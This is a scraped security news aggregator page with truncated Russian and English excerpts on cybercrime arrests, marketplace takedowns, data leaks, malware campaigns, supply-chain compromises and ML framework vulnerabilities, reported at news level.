2 days, 16 hours назад @ xakep.ru
По подозрению в атаке на американские телекомы арестован участник Scattered Spider
По подозрению в атаке на американские телекомы арестован участник Scattered Spider По подозрению в атаке на американские телекомы арестован участник Scattered Spider

По данным правоохранителей, задержанный Ремингтон Гой Оглтри (Remington Goy Ogletree), также известный в сети под ником remi, проник в сети трех неназванных компаний.

В том числе: скриншоты фишинговых сообщений и фишинговых страниц, собирающих учетные данные, а также скриншоты криптокошельков, содержавших десятки тысяч долларов в криптовалюте.

— В других фишинговых сообщениях сотрудникам заявляли, что в их отношении поступил "запрос от отдела кадров" или "обновился профиль VPN"».

В частности Scattered Spider известна своими атаками с использованием вымогательского ПО BlackCat (Alphv), Qilin и RansomHub, в том числе против MGM Resorts и сети казино Caesars Entertainment.

Осенью прошлого года…

2 days, 18 hours назад @ xakep.ru
Правоохранители изъяли 50 серверов Manson Market и закрыли торговую площадку
Правоохранители изъяли 50 серверов Manson Market и закрыли торговую площадку Правоохранители изъяли 50 серверов Manson Market и закрыли торговую площадку

Немецкие правоохранители конфисковали более 50 серверов, на которых размещался хакерский маркетплейс Manson Market, а также фальшивые интернет-магазины, использовавшиеся в фишинговых операциях.

По информации Европола, расследование деятельности Manson Market началось еще осенью 2022 года, после сообщений о телефонных мошенниках, которые выдавали себя за сотрудников банков и пытались выведать у жертв конфиденциальную информацию.

Также сообщается, что в Германии и Австрии уже арестованы два главных подозреваемых, которые якобы управляли Manson Market.

В общей сложности через Manson Market были проданы более 63 000 украденных записей.

Также правоохранители обнаружили на серверах Manson Market …

2 days, 20 hours назад @ xakep.ru
«Почта России» проводит проверку из-за сообщений об утечке данных
«Почта России» проводит проверку из-за сообщений об утечке данных «Почта России» проводит проверку из-за сообщений об утечке данных

Специалисты Data Leakage & Breach Intelligence (DLBI) предупредили, что в открытом доступе был опубликован небольшой фрагмент БД, содержащий информацию об отправлениях «Почты России».

Представители «Почты России» заявили, что уже проводят аудит безопасности и проверяют опубликованный фрагмент на принадлежность к утечке двухлетней давности.

Вскоре после публикации этого сообщения исследователей, представители «Почты России» сообщили СМИ, что «специалисты компании сейчас проводят аудит безопасности информационных систем и проверяют опубликованный фрагмент на принадлежность к утечке в июне 2022 года».

При этом основатель DLBI Ашот Оганесян отмечает, что новый дамп явно не имеет отношения к уте…

2 days, 22 hours назад @ xakep.ru
Хак-группа Turla захватила серверы пакистанской APT
Хак-группа Turla захватила серверы пакистанской APT Хак-группа Turla захватила серверы пакистанской APT

Тогда Turla получила доступ к сетям, которые уже взломала Storm-0156 (например, в афганских и индийских правительственных организациях), а затем развернула в них собственную малварь.

В Lumen рассказывают, что на протяжении нескольких лет отслеживали активность группы Storm-0156, и эти злоумышленники концентрировали свои атаки на Индии и Афганистане.

При этом Turla не остановилась на компрометации управляющих серверов Storm-0156 и атаках на уже взломанные цели.

Сообщается, что примерно в середине 2023 года русскоязычные хакеры осуществили боковое перемещение в инфраструктуре Storm-0156 и добрались до рабочих станций.

Стоит отметить, что Turla действует таким образом не впервые.

3 days, 11 hours назад @ xakep.ru
Luntry проведет вебинар «Подпись и валидация образов в Kubernetes»
Luntry проведет вебинар «Подпись и валидация образов в Kubernetes» Luntry проведет вебинар «Подпись и валидация образов в Kubernetes»

10 декабря в 11:00 (по московскому времени) эксперты Luntry проведут бесплатный вебинар , на котором расскажут о технических аспектах работы с валидацией образов.

Вебинар «Подпись и валидация образов в Kubernetes»Ведущими вебинара выступят основатель и директор Luntry Дмитрий Евдокимов и Станислав Проснеков, глава DevOps департамента.

Дмитрий и Станислав поделятся своим опытом и ответят на вопросы участников вебинара.

Тема: «Подпись и валидация образов в Kubernetes» Формат: бесплатный вебинар Спикеры: Дмитрий Евдокимов (Luntry) и Станислав Проснеков (Luntry) Время: 10 декабря 2024 года, 11:00 (по московскому времени) Место: https://luntry.ru/О LuntryЭксперты Luntry специализируются на безоп…

3 days, 14 hours назад @ xakep.ru
В сеть попали данные 760 000 сотрудников Xerox, Nokia, Morgan Stanley и других компаний
В сеть попали данные 760 000 сотрудников Xerox, Nokia, Morgan Stanley и других компаний В сеть попали данные 760 000 сотрудников Xerox, Nokia, Morgan Stanley и других компаний

В 2023 году множество компаний пострадали от атак на уязвимость нулевого дня в MOVEit Transfer (CVE-2023-34362).

Человек под ником Nam3L3ss опубликовал на хак-форуме Breached данные таких компаний, как Bank of America, Koch, Nokia, JLL, Xerox, Morgan Stanley и Bridgewater.

«Мы полагаем, что данные исходят от вымогательской группы Cl0p, которая часто эксплуатирует такие уязвимости для кражи и публикации конфиденциальных данных в рамках своих вымогательских кампаний.

Вероятно, Name3l3ss перерыл терабайты данных в даркнете и перепаковал их для более широкого использования», — говорят специалисты Atlas Privacy.

Напомним, что в прошлом месяце Name3l3ss выложил на BreachForums другую крупную БД, …

3 days, 14 hours назад @ xakep.ru
Руби наотмашь. Исследуем архитектуру приложения на Ruby и учимся его реверсить
Руби наотмашь. Исследуем архитектуру приложения на Ruby и учимся его реверсить Руби наотмашь. Исследуем архитектуру приложения на Ruby и учимся его реверсить

В сегод­няшней статье мы погово­рим о Ruby, вер­нее — о тон­костях и нюан­сах ревер­са написан­ных на этом язы­ке при­ложе­ний.

Для тех, кто хочет более деталь­но озна­комить­ся с его кон­цепци­ей и внут­ренней струк­турой, есть кни­га Ruby under a microscope.

В общем, как ты уже понял, цель сегод­няшней статьи — не пос­тижение дзе­на прог­рамми­рова­ния на Ruby, а сухой прак­тичес­кий раз­бор осо­бен­ностей ревер­са при­ложе­ний, реали­зован­ных на этой экзо­тике.

Вер­хние пять вызовов пред­став­ляют собой натив­ную обвязку чте­ния фай­ла и нам неин­терес­ны.

Ра­зуме­ется, нес­мотря на заяв­ленную экс­тра­ваган­тность, в точ­ности так же пос­тупа­ет и Ruby.

3 days, 16 hours назад @ xakep.ru
В Германии закрыли хакерский маркетплейс Crimenetwork
В Германии закрыли хакерский маркетплейс Crimenetwork В Германии закрыли хакерский маркетплейс Crimenetwork

Власти Германии закрыли крупнейший в стране маркетплейс для киберпреступников Crimenetwork.

На момент закрытия площадки и отключения северов Crimenetwork насчитывал более 100 зарегистрированных продавцов и свыше 100 000 пользователей, большинство из которых находились в немецкоязычных странах.

Пользователи торговой площадки могли оплачивать товары и услуги с помощью биткоинов или Monero (XMR).

В результате правоохранители полагают, что с 2018 года администрация площадки заработала не менее 5 000 000 долларов.

Помимо ареста предполагаемого администратора Crimenetwork, известного под ником Techmin, BKA заявляет о получении информации о зарегистрированных участниках платформы, и сообщает, что …

3 days, 18 hours назад @ xakep.ru
В библиотеку Solana Web3.js внедрили бэкдор, ворующий приватные ключи
В библиотеку Solana Web3.js внедрили бэкдор, ворующий приватные ключи В библиотеку Solana Web3.js внедрили бэкдор, ворующий приватные ключи

2 декабря 2024 года пакет Solana Web3.js был скомпрометирован в результате атаки на цепочку поставок и взлома аккаунта с соответствующими правами.

В результате в код библиотеки внедрили бэкдор для кражи приватных криптовалютных ключей.

Скомпрометированные версии Web3.js содержали вредоносный код, который позволял злоумышленникам похищать приватные ключи у разработчиков и пользователей, а в итоге — воровать чужую криптовалюту.

Проблема связана не с самим протоколом Solana, а с конкретной клиентской библиотекой JavaScript и, похоже, повлияла только на проекты, которые напрямую работают с приватными ключами», — пишут мейнтейнеры.

При этом специалисты GitHub предупреждают, что даже удаление пак…

3 days, 20 hours назад @ xakep.ru
Малварь DroidBot ворует данные из 77 финансовых и криптовалютных приложений
Малварь DroidBot ворует данные из 77 финансовых и криптовалютных приложений Малварь DroidBot ворует данные из 77 финансовых и криптовалютных приложений

Новая банковская Android-малварь DroidBot стремится похитить учетные данные из 77 криптовалютных и банковских приложений (включая Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken и Garanti BBVA).

Обнаружившая DroidBot компания Cleafy сообщает, что он активен с июня 2024 года и работает по схеме «малварь как услуга» (malware-as-a-service, MaaS).

Стоимость подписки на DroidBot составляет 3000 долларов США в месяц, и в настоящее время как минимум 17 группировок пользуются билдерами для кастомизации этой угрозы под конкретные цели.

Невзирая на эти безобидные личины, на зараженном устройстве он действует как троян и стремится похитить конфиденциальную и…

3 days, 22 hours назад @ xakep.ru
Правоохранители закрыли платформу для зашифрованных коммуникаций Matrix
Правоохранители закрыли платформу для зашифрованных коммуникаций Matrix Правоохранители закрыли платформу для зашифрованных коммуникаций Matrix

В результате международной операции Passionflower правоохранительные органы закрыли платформу для обмена зашифрованными сообщениями Matrix.

Операцию Passionflower координировали Европол и Евроюст, и в ней принимали участие правоохранительные органы многих европейских стран, включая Францию, Нидерланды, Италию, Литву, Испанию и Германию.

Тогда оказалось, что устройство преступника модифицировано, и на нем обнаружилось настроенное подключение к сервису Matrix, предназначенному для зашифрованных коммуникаций.

Клиентам платформы предлагалась собственная ОС Matrix, зашифрованные голосовые и видеозвонки, приложения для передачи зашифрованных сообщений, анонимный выход в интернет и отслеживание тр…

4 days, 11 hours назад @ xakep.ru
In English 🇺🇸
The Hacker News The Hacker News
последний пост 1 day, 19 hours назад
Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions
Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions Ultralytics AI Library Compromised: Cryptocurrency Miner Found in PyPI Versions

In yet another software supply chain attack, it has come to light that two versions of a popular Python artificial intelligence (AI) library named ultralytics were compromised to deliver a cryptocurrency miner.

The versions, 8.3.41 and 8.3.42, have since been removed from the Python Package Index (PyPI) repository.

A subsequently released version has introduced a security fix that "ensures secure publication workflow for the Ultralytics package."

ComfyUI, which has Ultralytics as one of its dependencies, said it has updated ComfyUI manager to warn users if they are running one of the malicious versions.

"It seems that the malicious payload served was simply an XMRig miner, and that the mali…

1 day, 19 hours назад @ thehackernews.com
Learn How Experts Secure Privileged Accounts—Proven PAS Strategies Webinar
Learn How Experts Secure Privileged Accounts—Proven PAS Strategies Webinar Learn How Experts Secure Privileged Accounts—Proven PAS Strategies Webinar

Even top organizations struggle to secure privileged accounts.

Traditional Privileged Access Management (PAM) solutions often fall short, leaving:Blind spots that limit full visibility.

Tailored PAS Strategies: Adapting PAS best practices to your organization's needs.

This webinar is ideal for:CISOs, CTOs, and IT Managers strengthening privileged access strategies.

strengthening privileged access strategies.

1 day, 22 hours назад @ thehackernews.com
Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals' Data
Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals' Data Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals' Data

"The threat actors behind the malware have set up fake companies using AI to make them increase legitimacy," Cado Security researcher Tara Gould said.

Users who end up on the site are prompted to download a Windows or macOS version depending on the operating system used.

This is accomplished by means of an osascript technique that has been adopted by several macOS stealer families such as Atomic macOS Stealer, Cuckoo, MacStealer, Banshee Stealer, and Cthulhu Stealer.

]gg to propagate a stealer malware that shares overlaps with Realst.

The development comes as the threat actors behind the Banshee Stealer macOS malware shut down their operations after the leak of their source code.

1 day, 22 hours назад @ thehackernews.com
Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok
Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok Romania Cancels Presidential Election Results After Alleged Russian Meddling on TikTok

In a historic decision, Romania's constitutional court has annulled the result of the first round of voting in the presidential election amid allegations of Russian interference.

As a result, the second round vote, which was scheduled for December 8, 2024, will no longer take place.

Călin Georgescu, who won the first round, denounced the verdict as an "officialized coup" and an attack on democracy.

That said, it's currently not clear from the document whether Georgescu was aware of the alleged campaign or assisted in it.

"The networks we have detected specifically targeting the Romanian elections have so far been small scale operations coordinated on TikTok that operated domestically," it s…

1 day, 23 hours назад @ thehackernews.com
FSB Uses Trojan App to Monitor Russian Programmer Accused of Supporting Ukraine
FSB Uses Trojan App to Monitor Russian Programmer Accused of Supporting Ukraine FSB Uses Trojan App to Monitor Russian Programmer Accused of Supporting Ukraine

A Russian programmer accused of donating money to Ukraine had his Android device secretly implanted with spyware by the Federal Security Service (FSB) after he was detained earlier this year.

A further examination of the Android device has since revealed that it was indeed tampered with a trojanized version of the genuine Cube Call Recorder application.

"Most of the malicious functionality of the application is hidden in an encrypted second stage of the spyware," the Citizen Lab said.

"Once the spyware is loaded onto the phone and executed, the second stage is decrypted and loaded into memory."

The Citizen Lab said it also spotted references to iOS in the source code, suggesting that there …

2 days, 14 hours назад @ thehackernews.com
Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks
Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks

Cybersecurity researchers have disclosed multiple security flaws impacting open-source machine learning (ML) tools and frameworks such as MLflow, H2O, PyTorch, and MLeap that could pave the way for code execution.

The vulnerabilities, discovered by JFrog, are part of a broader collection of 22 security shortcomings the supply chain security company first disclosed last month.

"An ML client is very likely to have access to important ML services such as ML Model Registries or MLOps Pipelines."

This, in turn, could expose sensitive information such as model registry credentials, effectively permitting a malicious actor to backdoor stored ML models or achieve code execution.

"To safeguard again…

2 days, 19 hours назад @ thehackernews.com
Conquering the Complexities of Modern BCDR
Conquering the Complexities of Modern BCDR Conquering the Complexities of Modern BCDR

However, achieving these stringent goals can be a daunting task with legacy or outdated backup solutions.

Your organization must implement proactive strategies and robust BCDR solutions to effectively tackle the challenges of today's dynamic environment.

Air-gapped backups enable effective protection by isolating copies of critical data from the primary network.

With modern backup and DR solutions, your organization can recover critical workloads within hours instead of days.

Overcome modern BCDR challenges with UnitrendsIn 2024, a large minority nearly 50%) of organizations fell victim to ransomware attacks.

2 days, 19 hours назад @ thehackernews.com
More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader
More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader More_eggs MaaS Expands Operations with RevC2 Backdoor and Venom Loader

This includes a novel information-stealing backdoor called RevC2 and a loader codenamed Venom Loader, both of which are deployed using VenomLNK, a staple tool that serves as an initial access vector for the deployment of follow-on payloads.

"Venom Loader is a new malware loader that is customized for each victim, using the victim's computer name to encode the payload."

The second campaign also begins with VenomLNK to deliver a lure image, while also stealthily executing Venom Loader.

The loader is responsible for launching More_eggs lite, a lightweight variant of the JavaScript backdoor that only provides RCE capabilities.

The disclosure comes as ANY.RUN detailed a previously undocumented f…

2 days, 22 hours назад @ thehackernews.com
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware
Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware

The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop.

"BlueAlpha has recently started using Cloudflare Tunnels to conceal staging infrastructure used by GammaDrop, an increasingly popular technique used by cybercriminal threat groups to deploy malware," Insikt Group noted.

"BlueAlpha continues to use domain name system (DNS) fast-fluxing of GammaLoad command-and-control (C2) infrastructure to complicate tracking and disruption of C2 communications to preserve access to compromised systems."

The GammaDrop artifact is retrieved from a staging server that sits behind a Cloudflare…

2 days, 23 hours назад @ thehackernews.com
This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges
This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges This $3,000 Android Trojan Targeting Banks and Cryptocurrency Exchanges

As many as 77 banking institutions, cryptocurrency exchanges, and national organizations have become the target of a newly discovered Android remote access trojan (RAT) called DroidBot.

"Moreover, it leverages dual-channel communication, transmitting outbound data through MQTT and receiving inbound commands via HTTPS, providing enhanced operation flexibility and resilience."

Specifically, DroidBot employs HTTPS for inbound commands, whereas outbound data from infected devices is transmitted using a messaging protocol called MQTT.

"The MQTT broker used by DroidBot is organised into specific topics that categorise the types of communication exchanged between the infected devices and the C2 in…

3 days, 14 hours назад @ thehackernews.com
Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access
Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access

Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances.

MiCollab is a software and hardware solution that integrates chat, voice, video, and SMS messaging with Microsoft Teams and other applications.

The SQL injection flaw was patched by Mitel in late May 2024 with the release of MiCollab version 9.8 SP1 (9.8.1.5).

"A successful exploit of this vulnerability could allow an attacker to gain unauthorized access, with potential impacts to the confidentiality, integrity, and availab…

3 days, 15 hours назад @ thehackernews.com
Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers
Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers Europol Shuts Down Manson Market Fraud Marketplace, Seizes 50 Servers

Europol on Thursday announced the shutdown of a clearnet marketplace called Manson Market that facilitated online fraud on a large scale.

The operation, led by German authorities, has resulted in the seizure of more than 50 servers associated with the service and the arrest of two suspects.

"The stolen data was traced back to a specialised online marketplace that operated as a central hub for the trade of illegally obtained information," Europol said.

The nations that took part in the joint law enforcement collaboration include Austria, Czechia, Finland, Germany, the Netherlands, and Poland.

A 27-year-old and a 37-year-old have been arrested in Germany and Austria, respectively, in connecti…

3 days, 15 hours назад @ thehackernews.com
Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor
Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor Hackers Target Uyghurs and Tibetans with MOONSHINE Exploit and DarkNimbus Backdoor

A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs.

An Android-based exploit kit, it's known to make use of various Chrome browser exploits with an aim to deploy payloads that can siphon sensitive data from compromised devices.

Earth Minotaur, per Trend Micro, has no direct connections to Earth Empusa.

"Earth Minotaur sends carefully crafted messages via instant messaging apps to entice victims to click an embedded malicious link," the researchers said.

The phony links lead to one of at le…

3 days, 18 hours назад @ thehackernews.com
Want to Grow Vulnerability Management into Exposure Management? Start Here!
Want to Grow Vulnerability Management into Exposure Management? Start Here! Want to Grow Vulnerability Management into Exposure Management? Start Here!

In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider Et Al.

To Start, Traditional Vulnerability Management is LimitedIt surprises nobody that traditional Vulnerability Management solutions struggle to keep up with the challenges of cybersecurity today.

And that's why shifting from vulnerability management to exposure management is a critical step in making this happen.

The Bottom LineThe time to shift from Vulnerability Management to Exposure Management isn't now - it's yesterday.

Gartner, Inc. How to Grow Vulnerability Management Into Exposure Management.

3 days, 19 hours назад @ thehackernews.com
Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers
Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers Researchers Uncover 4-Month Cyberattack on U.S. Firm Linked to Chinese Hackers

A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion.

According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August.

"The attackers moved laterally across the organization's network, compromising multiple computers," the Symantec Threat Hunter Team said in a report shared with The Hacker News.

"Some of the machines targeted were Exchange Servers, suggesting the attackers were gathering intelligence by harvesting emails.

"One group the attackers were particularly interested in is 'Exchange servers,' suggesting the attackers were attempting to …

3 days, 19 hours назад @ thehackernews.com
threatpost threatpost
последний пост None
DarkReading
последний пост None
WeLiveSecurity
последний пост 1 month назад
Life on a crooked RedLine: Analyzing the infamous infostealer’s backend
Life on a crooked RedLine: Analyzing the infamous infostealer’s backend Life on a crooked RedLine: Analyzing the infamous infostealer’s backend

To limit any possible confusion, we will use the following terms consistently throughout the text: RedLine malware : The RedLine Stealer malware or a sample thereof.

RedLine backend : Collection of modules that provide authentication and functionality for the RedLine panel.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

This includes the RedLine malware, the RedLine panel, and the RedLine backend modules.

Builder tab of the RedLine panelRedLine backendThe RedLine backend we analyzed in 2023 consists of two modules.

1 month назад @ welivesecurity.com
ESET APT Activity Report Q2 2024–Q3 2024
ESET APT Activity Report Q2 2024–Q3 2024 ESET APT Activity Report Q2 2024–Q3 2024

ESET APT Activity Report Q2 2024–Q3 2024 summarizes notable activities of selected advanced persistent threat (APT) groups that were documented by ESET researchers from April 2024 until the end of September 2024.

Additionally, China-aligned APT groups have been relying increasingly on the open-source and multiplatform SoftEther VPN to maintain access to victims’ networks.

For the first time, we saw an APT group – specifically ScarCruft – abusing Zoho cloud services.

Malicious activities described in ESET APT Activity Report Q2 2024–Q3 2024 are detected by ESET products; shared intelligence is based mostly on proprietary ESET telemetry data and has been verified by ESET researchers.

Attack s…

1 month назад @ welivesecurity.com
Jane Goodall: Reasons for hope | Starmus highlights
Jane Goodall: Reasons for hope | Starmus highlights Jane Goodall: Reasons for hope | Starmus highlights

The trailblazing scientist shares her reasons for hope in the fight against climate change and how we can tackle seemingly impossible problems and keep going in the face of adversityRenowned ethologist and conservationist Jane Goodall offers a sobering, but hopeful reflection on the precarious state of our planet.

With ecosystems worldwide facing unprecedented threats from climate change, biodiversity loss, intensive farming, deforestation, and pollution, Earth is undergoing what scientists call the sixth mass extinction.

Unlike in the past, however, this one is driven by human activity, accelerating species loss at rates much faster than typical evolutionary processes.

Yet, Ms. Goodall – w…

1 month назад @ welivesecurity.com
Month in security with Tony Anscombe – October 2024 edition
Month in security with Tony Anscombe – October 2024 edition Month in security with Tony Anscombe – October 2024 edition

Each month, ESET's Chief Security Evangelist Tony Anscombe will bring you a roundup of the latest cybersecurity news and insights – all in five or so minutes.

Let's cut to the chase now and review some of the most impactful cybersecurity stories of October 2024.

Recent weeks have also seen a number of damaging hacks and breaches, including one hitting American Water, the largest US water utility, and two incidents targeting The Internet Archive.

Meanwhile, lawmakers have also been busy this month, as Australia introduced its first cybersecurity legislation.

In the US, the Cybersecurity and Infrastructure Security Agency (CISA) proposed new security requirements to protect personal and gover…

1 month, 1 week назад @ welivesecurity.com
How to remove your personal information from Google Search results
How to remove your personal information from Google Search results How to remove your personal information from Google Search results

If not, consider requesting the removal of your personal information from search results.

What shows up in Google Search?

Unsurprisingly, the search results become more specific, showcasing how powerful search engines are at pinpointing someone’s data.

How to use Google’s “Results about you”To use this feature, you need to have a Google account.

For the browser version, follow these steps:Log into your Google account and click on your profile avatar.

1 month, 1 week назад @ welivesecurity.com
Don't become a statistic: Tips to help keep your personal data off the dark web
Don't become a statistic: Tips to help keep your personal data off the dark web Don't become a statistic: Tips to help keep your personal data off the dark web

The dark web is thrivingFirst things first: Contrary to popular assumption, the dark web is not illegal and it’s not populated solely by cybercriminals.

Even worse, 700 of these emails had passwords associated with them stored in plain text and exposed on dark web sites.

There are various ways your own data could end up in a dark web forum or site.

If you’re signed up to an identity protection or dark web monitoring service, it should flag any PII or other data it finds on the dark web.

See what’s lurking out there on the dark web right now and it may never get to that stage.

1 month, 1 week назад @ welivesecurity.com
Tony Fadell: Innovating to save our planet | Starmus highlights
Tony Fadell: Innovating to save our planet | Starmus highlights Tony Fadell: Innovating to save our planet | Starmus highlights

So what's the real story with methane and how exactly do the emissions of this powerful greenhouse gas accelerate climate change?

Increased awareness of methane’s potent warming effect and the urgency of reducing methane emissions have prompted a slew of methane-reducing initiatives.

To get a grip on the problem, however, the world first needs to identify emission sources with pinpoint accuracy.

This is where state-of-the-art satellite technology comes in.

In his talk, the legendary engineer and entrepreneur Tony Fadell talks about MethaneSAT, a pioneering satellite that orbits the planet in order to map and track the sources of methane emissions primarily from oil and gas operations, which…

1 month, 1 week назад @ welivesecurity.com
CloudScout: Evasive Panda scouting cloud services
CloudScout: Evasive Panda scouting cloud services CloudScout: Evasive Panda scouting cloud services

The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies.

CloudScout utilizes stolen cookies, provided by MgBot plugins, to access and exfiltrate data stored at various cloud services.

In February 2023, CloudScout modules and the Nightdoor implant were detected at what we suspect is a Taiwanese government entity.

The CloudScout module obtains a new configuration by continuously monitoring its working directory, looking for files with .dat extensions.

This package is stored in the resources section of CloudScout modules and is loaded at the beginning of the ModuleStart function.

1 month, 1 week назад @ welivesecurity.com
ESET Research Podcast: CosmicBeetle
ESET Research Podcast: CosmicBeetle ESET Research Podcast: CosmicBeetle

Then there are threat actors like CosmicBeetle – they lack the necessary skills set, write crude malware, yet still compromise interesting targets, and achieve “stealth” by using odd, impractical and overcomplicated techniques.

Discussing further with ESET Research Podcast host and Distinguished Researcher Aryeh Goretsky, Jakub shared his view of CosmicBeetle’s encryption routine, information about their victimology, and details of their “involvement” with high-profile gangs such as LockBit and RansomHub.

For details on how this crude and clumsy threat actor, whose malicious tools are “riddled with bugs”, achieved to penetrate any of its targets, listen to this ESET Research Podcast episode…

1 month, 2 weeks назад @ welivesecurity.com
Embargo ransomware: Rock’n’Rust
Embargo ransomware: Rock’n’Rust Embargo ransomware: Rock’n’Rust

ESET researchers have discovered new Rust-based tooling leading to the deployment of Embargo ransomware.

C:\Windows\Debug\a.cacheRC4-encrypted Embargo ransomware.

C:\Windows\Debug\pay.exeDecrypted Embargo ransomware.

Tactic ID Name Description Resource Development T1587.001 Develop Capabilities: Malware Embargo group develops its custom toolkit – MDeployer, MS4Killer, and Embargo ransomware.

T1486 Data Encrypted for Impact Embargo ransomware encrypts files on compromised machines.

1 month, 2 weeks назад @ welivesecurity.com
Google Voice scams: What are they and how do I avoid them?
Google Voice scams: What are they and how do I avoid them? Google Voice scams: What are they and how do I avoid them?

The classic Google Voice scam goes something like this:Setting up a Google Voice account .

The fraudster downloads the Google voice app and links it to a Google account, much like anyone else does..

The fraudster downloads the Google voice app and links it to a Google account, much like anyone else does.

Then they may do one of several things:Sell your Google Voice number and account to other scammersPlace vishing calls designed to scam victims, using your Google Voice accountEmbed your Google Voice number into email phishing or smishing messagesUse the Google Voice voicemail feature to record messages posing as legitimate authorities, in order to further their scamsUse the Google Voice num…

1 month, 2 weeks назад @ welivesecurity.com
Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe
Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe

The rest of the software flaws under review were exploited as n-days; i.e., vulnerabilities first exploited after patches are made available (versus zero days, which are abused before patches are released).

The average time to exploit a software flaw has been shrinking considerably over the years – from 63 days in 2018-2019 all the way to only five days last year.

These and other figures in the report underscore a disconcerting trend: threat actors are rapidly getting better at spotting and weaponizing software vulnerabilities, which clearly poses an escalating threat to businesses and individuals alike.

What else did the report find and how does the market for zero-day exploits factor into…

1 month, 3 weeks назад @ welivesecurity.com
Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7)
Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7) Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7)

“Hey, wanna chat?” This innocent phrase can take on a sinister meaning when it comes from an adult to a child online and even be the start of a predatory relationship“Hey, wanna chat?” What sounds like a casual and innocent phrase between adults can take a sinister turn when it comes from an adult to a child online – and even be the start of a predatory relationship.

Grooming, where an adult uses psychological tactics to gain a child’s trust in order to manipulate, exploit, or abuse them, is a pervasive problem these days.

It often occurs online, where predators may use social media, gaming platforms, or messaging apps to contact minorsIn this episode of Unlocked 403, Becks sat down with ch…

1 month, 3 weeks назад @ welivesecurity.com
Quishing attacks are targeting electric car owners: Here’s how to slam on the brakes
Quishing attacks are targeting electric car owners: Here’s how to slam on the brakes Quishing attacks are targeting electric car owners: Here’s how to slam on the brakes

Although QR codes have been around since the 90s, quishing as a threat really started to appear during the pandemic.

Fraudsters leapt into action, sticking fake QR codes over the real ones.

There have been a number of reports about scammers targeting motorists via malicious QR codes stuck to parking meters.

If you’re uncomfortable scanning a QR code, consider using one of these alternatives to avoid the risk of interacting with a fraudulent code.

News of the latest QR quishing campaign will only increase calls for codes to be banned from public places.

1 month, 3 weeks назад @ welivesecurity.com
Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships
Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships Aspiring digital defender? Explore cybersecurity internships, scholarships and apprenticeships

In this blog, we’ll explore cybersecurity internships, scholarships and apprenticeships as three great pathways, especially for young people, to jump-start their careers in this exciting and rewarding field.

For example, ESET currently runs Women in Cybersecurity scholarships for female undergraduates looking to pursue a career in cybersecurity in the UK , US, Canada and Australia.

Some cybersecurity apprenticeships prepare you for industry certifications that validate the training and expertise learned, enhancing employability further down the line.

Job security: Almost all industries require cybersecurity, including health, government, education, law, financial services, and manufacturing…

1 month, 3 weeks назад @ welivesecurity.com
Naked Security Naked Security
последний пост None
Help Net Security Help Net Security
последний пост 1 час назад
Who handles what? Common misconceptions about SaaS security responsibilities
Who handles what? Common misconceptions about SaaS security responsibilities Who handles what? Common misconceptions about SaaS security responsibilities

In this Help Net Security interview, James Dolph, CISO at Guidewire, addresses common misconceptions about security responsibilities in cloud environments, particularly in SaaS, and how these misunderstandings can lead to security risks.

SaaS providers and their customers both care deeply about security, compliance, and meeting global regulations.

This can lead to misunderstandings, either assuming the SaaS provider handles everything or overcompensating by duplicating efforts.

In an incident response scenario, how should the roles and responsibilities be divided between the SaaS provider and the customer?

Beyond reviews, some SaaS providers allow customers to conduct their own security ass…

1 час назад @ helpnetsecurity.com
What makes for a fulfilled cybersecurity career
What makes for a fulfilled cybersecurity career What makes for a fulfilled cybersecurity career

In this Help Net Security video, Richard Hummel, NETSCOUT’s Director of Threat Intelligence, talks about his journey into cybersecurity and offers insight for those that are interested in pursuing it as a career.

1 час назад @ helpnetsecurity.com
Top cybersecurity books for your holiday gift list
